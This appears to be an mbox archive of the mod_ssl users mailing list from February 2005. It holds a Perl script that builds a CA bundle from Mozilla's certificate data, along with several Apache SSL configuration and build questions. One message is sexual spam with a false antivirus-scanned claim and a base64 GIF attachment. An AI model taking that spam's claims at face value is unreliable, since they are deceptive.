> Cary, NC  27511
> Office 919-379-8513
> Cell    919-272-8833
> spencer.plantier@stratech.com
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

...Love is the ultimate outlaw.  It just won't adhere to rules.
The most any of us can do is sign on as it's accomplice.  Instead
of vowing to honor and obey, maybe we should swear to aid and abet.
That would mean that security is out of the question.  The words
"make" and "stay" become inappropriate.  My love for you has no
strings attached.  I love you for free...
                        -Tom Robins 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  2 14:45:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5FBABA8A9B; Wed,  2 Feb 2005 14:45:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 951F9A8A91
	for ; Wed,  2 Feb 2005 14:45:35 +0100 (CET)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11/8.12.11) with ESMTP id j12Dj42U020307;
	Wed, 2 Feb 2005 08:45:04 -0500
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id j12Dj3O29281;
	Wed, 2 Feb 2005 08:45:03 -0500
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.13.1/8.12.7) with ESMTP id j12Dj2Qt013368;
	Wed, 2 Feb 2005 13:45:02 GMT
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.13.1/8.12.10/Submit) id j12Dj1R4013366;
	Wed, 2 Feb 2005 13:45:01 GMT
Date: Wed, 2 Feb 2005 13:45:01 +0000
From: Joe Orton 
To: "Ralf S. Engelschall" ,
	modssl-users@modssl.org
Subject: updating ca-bundle.crt
Message-ID: <20050202134501.GA13157@redhat.com>
Mail-Followup-To: "Ralf S. Engelschall" ,
	modssl-users@modssl.org
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="XsQoSWH+UP9D9v3l"
Content-Disposition: inline
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--XsQoSWH+UP9D9v3l
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline

There was some discussion on modssl-users a while back on this topic; we
had some concerns about extracting ca-bundle.crt directly from the
Mozilla CA list sources.  But after discussing this with Frank Hecker 
and some others there is agreement that there are no licensing issues 
here really.

So, attached is a Perl script which regenerates ca-bundle.crt directly
from the Mozilla certdata.txt: Ralf, feel free to include this in
mod_ssl or just update the mod_ssl ca-bundle.crt using it ;)

joe




--XsQoSWH+UP9D9v3l
Content-Type: text/plain; charset=utf-8
Content-Disposition: attachment; filename="mkcabundle.pl"

#!/usr/bin/perl -w
#
# Used to regenerate ca-bundle.crt from the Mozilla certdata.txt.
# Run as ./mkcabundle.pl > ca-bundle.crt
#

my $cvsroot = ':pserver:anonymous@cvs-mirror.mozilla.org:/cvsroot';
my $certdata = 'mozilla/security/nss/lib/ckfw/builtins/certdata.txt';

open(IN, "cvs -d $cvsroot co -p $certdata|")
    || die "could not check out certdata.txt";

my $incert = 0;

print<) {
    if (/^CKA_VALUE MULTILINE_OCTAL/) {
        $incert = 1;
        open(OUT, "|openssl x509 -text -inform DER -fingerprint")
            || die "could not pipe to openssl x509";
    } elsif (/^END/ && $incert) {
        close(OUT);
        $incert = 0;
        print "\n\n";
    } elsif ($incert) {
        my @bs = split(/\\/);
        foreach my $b (@bs) {
            chomp $b;
            printf(OUT "%c", oct($b)) unless $b eq '';
        }
    } elsif (/^CVS_ID.*Revision: ([^ ]*).*/) {
        print "# Generated from certdata.txt RCS revision $1\n#\n";
    }
}

--XsQoSWH+UP9D9v3l--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb  6 18:57:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E5F6214EA96; Sun,  6 Feb 2005 18:57:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.microtechniques.com (microtechniques.com [66.167.20.50])
	by master.modssl.org (Postfix) with ESMTP id 95B2114EA8F
	for ; Sun,  6 Feb 2005 18:57:35 +0100 (CET)
Received: from 127.0.0.1 (localhost [127.0.0.1])
	by mail.microtechniques.com (Falcon mail server) with SMTP id C37A9BABD
	for ; Sun,  6 Feb 2005 12:57:34 -0500 (EST)
Received: from [10.168.2.20] (wren.Net1.microtechniques.com [10.168.2.20])
	by mail.microtechniques.com (Falcon mail server) with ESMTP id 860A0B094
	for ; Sun,  6 Feb 2005 12:57:34 -0500 (EST)
Received: from 127.0.0.1 (AVG SMTP 7.0.300 [265.8.5]); Sun, 06 Feb 2005 12:57:33 -0500
From: "Don Hughes" 
To: modssl-users@modssl.org
Date: Sun, 06 Feb 2005 12:57:33 -0500
MIME-Version: 1.0
Subject: mod_ssl configuration
Message-ID: <4206143D.6843.480916F@localhost>
X-mailer: Pegasus Mail for Windows (4.21c)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on 
	Falcon.Net1.microtechniques.com
X-Spam-Level: 
X-Spam-Status: No, score=-5.6 required=5.0 tests=ALL_TRUSTED,AWL,BAYES_00 
	autolearn=disabled version=3.0.1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Don Hughes" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am trying to add https support to an existing Apache2/Linux 
installation.  I have Apache experience, but no mod_ssl 
experience.

I recompiled Apache 2.0.52 with --enable-SSL

I created the various keys using the instructions in "Apache2 
SSL/TLS Strong Encryption: FAQ"

for initial testing, I removed the encryption from the private 
key and CA

I modified the sign.sh file with my path names and created a self 
signed certificate.

I used the information in "Apache2 Apache Module mod_ssl" to 
modify the Apache ssl.conf file to point to the key files 
created.

I created a virual host listening on port 443

I restarted Apache.  There were no error messages in the file, 
and it shows mod-ssl/2.0.52 OpenSSL/0.9.7d

testing with:

openssl s_client -connecl localhost:443 -stat -debug
gives:

SSL_connect:before/connect initialization
SSL_connect:SSLv2/v3 write client hello A
SSL_connect:error in SSLv2/v3 read server hello A
10421:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown 
protocol:s23_clnt.c:475:


I tried modifying the options on the SSLCipherSuite Directive.

I have been unable to get past this error.

 
..don

support at microtechniques.com
White Plains, NY


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb  7 15:18:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 354E614EAB3; Mon,  7 Feb 2005 15:18:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.microtechniques.com (microtechniques.com [66.167.20.50])
	by master.modssl.org (Postfix) with ESMTP id EAF9314EA9B
	for ; Mon,  7 Feb 2005 15:18:49 +0100 (CET)
Received: from 127.0.0.1 (localhost [127.0.0.1])
	by mail.microtechniques.com (Falcon mail server) with SMTP id 1FFE3B5DB
	for ; Mon,  7 Feb 2005 09:18:48 -0500 (EST)
Received: from [10.168.2.20] (wren.Net1.microtechniques.com [10.168.2.20])
	by mail.microtechniques.com (Falcon mail server) with ESMTP id D74F3875B
	for ; Mon,  7 Feb 2005 09:18:47 -0500 (EST)
Received: from 127.0.0.1 (AVG SMTP 7.0.300 [265.8.5]); Mon, 07 Feb 2005 09:18:46 -0500
From: "Don Hughes" 
To: modssl-users@modssl.org
Date: Mon, 07 Feb 2005 09:18:46 -0500
MIME-Version: 1.0
Subject: Unknown protocol error
Message-ID: <42073276.31042.8DEA353@localhost>
X-mailer: Pegasus Mail for Windows (4.21c)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on 
	Falcon.Net1.microtechniques.com
X-Spam-Level: 
X-Spam-Status: No, score=-5.6 required=5.0 tests=ALL_TRUSTED,AWL,BAYES_00 
	autolearn=disabled version=3.0.1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Don Hughes" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am trying to add https support to an existing Apache2/Linux 
installation.  I have Apache experience, but no mod_ssl 
experience.

I recompiled Apache 2.0.52 with --enable-SSL

I created the various keys using the instructions in "Apache2 
SSL/TLS Strong Encryption: FAQ"

for initial testing, I removed the encryption from the private 
key and CA

I modified the sign.sh file with my path names and created a self 
signed certificate.

I used the information in "Apache2 Apache Module mod_ssl" to 
modify the Apache ssl.conf file to point to the key files 
created.

I created a virual host listening on port 443

I restarted Apache.  There were no error messages in the file, 
and it shows mod-ssl/2.0.52 OpenSSL/0.9.7d

testing with:

openssl s_client -connecl localhost:443 -stat -debug
gives:

SSL_connect:before/connect initialization
SSL_connect:SSLv2/v3 write client hello A
SSL_connect:error in SSLv2/v3 read server hello A
10421:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown 
protocol:s23_clnt.c:475:


I tried modifying the options on the SSLCipherSuite Directive.

I have been unable to get past this error.

 
..don

support at microtechniques.com
White Plains, NY



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  9 00:13:51 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 09F0114EAB0; Wed,  9 Feb 2005 00:13:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from athena.zerobit.net (athena.zerobit.net [69.41.174.254])
	by master.modssl.org (Postfix) with ESMTP id 4AA0614EA8E
	for ; Wed,  9 Feb 2005 00:13:49 +0100 (CET)
Received: (qmail 24711 invoked from network); 8 Feb 2005 17:04:41 -0600
Received: from txplano-nat209.dc.xo.com (HELO ?10.76.132.236?) (205.158.160.209)
  by athena.zerobit.net with SMTP; 8 Feb 2005 17:04:41 -0600
Message-ID: <420947AB.8010603@zerobit.net>
Date: Tue, 08 Feb 2005 17:13:47 -0600
From: Zach 
User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Apache2 certificate based authentication
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zach 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users




  


Hello
all,



I've setup a https server on a vhost. This works ok,
but when I try and
restrict clients only to ones who have a CA signed certificate it
doesn't work.




This is the error message I get out of the ssl_error_log:



[Tue Feb 08 11:59:54 2005] [error] Certificate Verification: Error
(20): unable to get local issuer certificate

[Tue Feb 08 11:59:54 2005] [debug] ssl_engine_kernel.c(1789): OpenSSL:
Write: SSLv3 read client certificate B

[Tue Feb 08 11:59:54 2005] [debug] ssl_engine_kernel.c(1808): OpenSSL:
Exit: error in SSLv3 read client certificate B





And this from the regular error_log:



[Tue Feb 08 11:59:52 2005] [info] Initial (No.1) HTTPS request
received for child 2 (server www.domain.net:443)


[Tue Feb 08 11:59:52 2005] [debug] ssl_engine_kernel.c(422): Changed
client verification type will force renegotiation


[Tue Feb 08 11:59:52 2005] [info] Requesting connection re-negotiation


[Tue Feb 08 11:59:52 2005] [debug] ssl_engine_kernel.c(650): Performing
full renegotiation: complete handshake protocol


[Tue Feb 08 11:59:52 2005] [info] Awaiting re-negotiation handshake


[Tue Feb 08 11:59:54 2005] [error] Re-negotiation handshake failed: Not
accepted by client!?






And finally here's my mod_ssl.default-vhost.conf
before I give some background on the issue:



<VirtualHost *:443>

DocumentRoot "/www/https"

ServerName www.domain.net

ServerAdmin webmaster@domain.net

SSLEngine on

SSLProtocol -all +TLSv1 +SSLv3

SSLCipherSuite HIGH:MEDIUM

SSLCertificateFile conf/ssl/https.crt

SSLCertificateKeyFile /etc/apache2/conf/ssl/https.key

CustomLog logs/ssl_request_log \

"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



<IfModule mod_log_config.c>

TransferLog logs/ssl_access_log

</IfModule>

<IfModule mod_setenvif.c>

SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown \

downgrade-1.0 force-response-1.0

</IfModule>



<Directory /www/https/certsec>

SSLVerifyClient require

SSLVerifyDepth 1

SSLCACertificateFile /etc/apache2/conf/ssl/my-ca.crt

AllowOverride None

Order allow,deny

Allow from all

</Directory>

</VirtualHost> 



What you see above is the current version of a file that's been
reconfigured about 3 different ways. The first time I attempted to use
a CA cert that already existed, and exporting a key that was already
signed by that CA. Under this config I had the SSLCACertificateFile pointed to
the cacert.pem of the CA. After scratching that config, I with creating
hash symlinks in my conf/ssl folder to a copy of the cacert in
/etc/ssl/certs/. That didn't work, so I followed the instructions
detailed in http://www.vanemery.com/Linux/Apache/apache-SSL.html.
Again, to no avail, all three attempts netted the same two errors I
pasted above. Extensive googling on them turned up little, leaving my
only recourse this list. Any help would be greatly appreciated!



Regards, Zach




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb  9 11:44:57 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9084014EAB5; Wed,  9 Feb 2005 11:44:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fw.ykhm.cij.co.jp (fw.cij.co.jp [61.206.48.131])
	by master.modssl.org (Postfix) with ESMTP id 0F15214EA8E
	for ; Wed,  9 Feb 2005 11:44:55 +0100 (CET)
Received: from fw.cij.co.jp (fw.ykhm.cij.co.jp [192.168.9.99])
	by fw.ykhm.cij.co.jp (Postfix) with ESMTP id 749B83B74C
	for ; Wed,  9 Feb 2005 19:44:35 +0900 (JST)
Received: from kauai.ykhm.cij.co.jp (kauai.ykhm.cij.co.jp [192.168.9.2])
	by fw.cij.co.jp (Postfix) with ESMTP id 4FF5EC68DD
	for ; Wed,  9 Feb 2005 19:44:35 +0900 (JST)
Received: from [127.0.0.1] (ibook.itc.ykhm.cij.co.jp [192.168.1.132])
	by kauai.ykhm.cij.co.jp (Postfix) with ESMTP
	id 3B7354BCB7; Wed,  9 Feb 2005 19:44:35 +0900 (JST)
Message-ID: <4209E97B.7080902@cij.co.jp>
Date: Wed, 09 Feb 2005 19:44:11 +0900
From: Tsuyoshi Kurata 
User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206)
X-Accept-Language: ja, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: RSA/DSA Certificate&Key Specifications
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tsuyoshi Kurata 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I have two questions.
In the start of Apache2.0.52 and mod_ssl,

(Q1)
I describe SSLCertificateFile & SSLCertificateKeyFile Directive on
"ssl.conf". RSA certificate file & the private key on ssl.conf.

started Apache (apachectl startssl).

then, renew "ssl.conf" - rewrite the DSA server certificate and the
private key on part of "RSA certificate/private key".

then, I command HUP to Apache (apachectl -k restart), reloaded the
configuration file again.

I expect that RSA key will not be valid, DSA key will be valid.

but, both of RSA & DSA are valid.
Is this a specification?


(Q2)
I describe two certificate and private-key (RSA&DSA) on "ssl.conf"
# The password of two private keys is the same.

started Apache (apachectl startssl).

I expect that Apache require each password for RSA key and DSA key.
But, the password-entry request appeared only once.
however, I get possible to use both of RSA and DSA private key.

when the each password are different, the password-entry request
appeared twice.

Is this a specification ?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb 13 04:13:58 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0571C14EAB5; Sun, 13 Feb 2005 04:13:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 8C83814DCB8
	for ; Sun, 13 Feb 2005 04:13:54 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id UAA07755
	for ; Sat, 12 Feb 2005 20:45:12 -0500
Date: Sat, 12 Feb 2005 20:45:10 -0500 (EST)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: apache/modssl make fails on slack 10.0
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Not likeing the layout of pache/modssl on slackware, I'm rebuilding a new
system to replace an older setup, and all fails in the make process with;

mod_auth_dbm.c:41:18: ndbm.h: No such file or directory
mod_auth_dbm.c: In function `get_dbm_pw':
mod_auth_dbm.c:109: error: `DBM' undeclared (first use in this function)
mod_auth_dbm.c:109: error: (Each undeclared identifier is reported only
once
mod_auth_dbm.c:109: error: for each function it appears in.)
mod_auth_dbm.c:109: error: `f' undeclared (first use in this function)
mod_auth_dbm.c:110: error: `datum' undeclared (first use in this function)
mod_auth_dbm.c:110: error: parse error before "d"
mod_auth_dbm.c:113: error: `q' undeclared (first use in this function)
mod_auth_dbm.c:127: error: `d' undeclared (first use in this function)
make[4]: *** [mod_auth_dbm.so] Error 1
make[3]: *** [all] Error 1
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/usr/local/src/web/apache_1.3.33/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/usr/local/src/web/apache_1.3.33'
make: *** [build] Error 2


the ./configure stage reports this midstram;

make[1]: Leaving directory `/usr/local/src/web/apache_1.3.33'
make: *** [build] Error 2
root@nova:/usr/local/src/web/apache_1.3.33# ./configure
--enable-module=ssl --enable-shared=ssl --enable-rule=SSL_SDBM
--enable-module=most --enable-shared=max
--enable-suexec --suexec-uidmin=100 --suexec-gidmin=70
--suexec-safepath="/bin:/usr/bin:/usr/local/bin"
Configuring for Apache, Version 1.3.33
 + using installation path layout: Apache (config.layout)
Creating Makefile
Creating Configuration.apaci in src
 + enabling mod_so for DSO support
Creating Makefile in src
 + configured for Linux platform
 + setting C compiler to gcc
 + setting C pre-processor to gcc -E
 + using "tr [a-z] [A-Z]" to uppercase
 + checking for system header files
 + adding selected modules
    o rewrite_module uses ConfigStart/End
      disabling DBM support for mod_rewrite
      (perhaps you need to add -ldbm, -lndbm or -lgdbm to EXTRA_LIBS)
    o dbm_auth_module uses ConfigStart/End

so the question how and where do I add the -lgdbm to EXTRA_LIBS to get
this to build?  even gdbm man page states;

       If you wish to use the dbm or ndbm compatibility routines,
       you must link in the gdbm_compat  library  as  well.   For
       example:

            gcc -o prog proc.c -lgdbm -lgdbm_compat

but, which configure.tmpl or Makefile get the addition?

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

...Love is the ultimate outlaw.  It just won't adhere to rules.
The most any of us can do is sign on as it's accomplice.  Instead
of vowing to honor and obey, maybe we should swear to aid and abet.
That would mean that security is out of the question.  The words
"make" and "stay" become inappropriate.  My love for you has no
strings attached.  I love you for free...
                        -Tom Robins 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 14 09:31:04 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 68BB814EABA; Mon, 14 Feb 2005 09:31:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.30.6.168 (internal-host.pnm.my [161.142.132.201])
	by master.modssl.org (Postfix) with SMTP id 6891514EA97
	for ; Mon, 14 Feb 2005 09:31:02 +0100 (CET)
From: "rse" 
To: modssl-users@modssl.org
Subject: Asses Mpeg's
Date: 14 Feb 2005 16:30:59 +0000
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20050214083102.6891514EA97@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


u Love asses? Here is a great ass open wide waitin for ur lil Cock
Bye
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 14 12:00:53 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8843A14EABA; Mon, 14 Feb 2005 12:00:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail1.bundestag.de (Mail1.bundestag.de [193.17.243.1])
	by master.modssl.org (Postfix) with ESMTP id 52F1314EA8F
	for ; Mon, 14 Feb 2005 12:00:50 +0100 (CET)
Received: from smtp-2.bundestag.de (c.mx.intern.out [172.16.47.1])
	by mail1.bundestag.de (Postfix) with ESMTP id A7D445C41B4
	for ; Mon, 14 Feb 2005 12:00:49 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by smtp-2.bundestag.de (Postfix) with ESMTP id 8A94D2945E9
	for ; Mon, 14 Feb 2005 12:00:49 +0100 (CET)
Received: from smtp-2.bundestag.de ([127.0.0.1])
	by localhost (smtp-2 [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 10168-09 for ;
	Mon, 14 Feb 2005 12:00:49 +0100 (CET)
Received: from pop3.spd.frak (unknown [172.22.1.4])
	by smtp-2.bundestag.de (Postfix) with ESMTP id 5F3C180001
